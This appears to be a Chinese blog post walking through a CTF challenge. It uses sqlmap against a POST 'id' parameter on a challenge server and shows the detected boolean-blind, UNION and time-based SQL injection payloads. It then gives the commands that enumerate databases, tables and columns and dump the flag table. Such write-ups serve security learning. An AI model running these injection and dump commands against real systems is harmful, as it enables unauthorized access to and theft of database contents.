SQLmap 爆破

1、Sqlmap  -u "http://114.67.246.176:11055/index.php?" --data="id=1"   (这里  --data=“id=1” 是自己提交的post数据)

 

 2、输出数据库类型

POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: POST
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7574=7574 AND 'SIlI'='SIlI

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a7868723a,0x707871544f7373644575,0x3a75736a3a), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'kCqI'='kCqI
---
[14:28:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11

说明可以爆破

继续。。。。

2、查看所有的数据库

 Sqlmap  -u "http://114.67.246.176:11055/index.php?" --data="id=1" --dbs

 

3、 猜测 flag 可能在skctf 中,所以选择整个数据库,查看里面的表名

 Sqlmap  -u "http://114.67.246.176:11055/index.php?" --data="id=1" -D skctf --table

 

 4、继续查看表中的列名

Sqlmap  -u "http://114.67.246.176:11055/index.php?" --data="id=1" -D skctf -T  fl4g --columns

 

 5、转存数据表列中的字符串信息

Sqlmap  -u "http://114.67.246.176:11055/index.php?" --data="id=1" -D skctf -T  fl4g --columns --dump

 

 这样我们就拿到了 flag

posted @ 2020-12-24 14:42  疏桐  阅读(625)  评论(0编辑  收藏  举报
function e(n){ return document.getElementsByTagName(n) } function t(){ var t=e("script"),o=t.length,i=t[o-1]; return{ l:o,z:n(i,"zIndex",-1),o:n(i,"opacity",.5),c:n(i,"color","0,0,0"),n:n(i,"count",99) } } function o(){ a=m.width=window.innerWidth||document.documentElement.clientWidth||document.body.clientWidth, c=m.height=window.innerHeight||document.documentElement.clientHeight||document.body.clientHeight } function i(){ r.clearRect(0,0,a,c); var n,e,t,o,m,l; s.forEach(function(i,x){ for(i.x+=i.xa,i.y+=i.ya,i.xa*=i.x>a||i.x<0?-1:1,i.ya*=i.y>c||i.y<0?-1:1,r.fillRect(i.x-.5,i.y-.5,1,1),e=x+1;e=n.max/2&&(i.x-=.03*o,i.y-=.03*m), t=(n.max-l)/n.max,r.beginPath(),r.lineWidth=t/2,r.strokeStyle="rgba("+d.c+","+(t+.2)+")",r.moveTo(i.x,i.y),r.lineTo(n.x,n.y),r.stroke())) }), x(i) } var a,c,u,m=document.createElement("canvas"), d=t(),l="c_n"+d.l,r=m.getContext("2d-disabled"), x=window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame|| function(n){ window.setTimeout(n,1e3/45) }, w=Math.random,y={x:null,y:null,max:2e4};m.id=l,m.style.cssText="position:fixed;top:0;left:0;z-index:"+d.z+";opacity:"+d.o,e("body")[0].appendChild(m),o(),window.onresize=o, window.onmousemove=function(n){ n=n||window.event,y.x=n.clientX,y.y=n.clientY }, window.onmouseout=function(){ y.x=null,y.y=null }; for(var s=[],f=0;d.n>f;f++){ var h=w()*a,g=w()*c,v=2*w()-1,p=2*w()-1;s.push({x:h,y:g,xa:v,ya:p,max:6e3}) } u=s.concat([y]), setTimeout(function(){i()},100) }();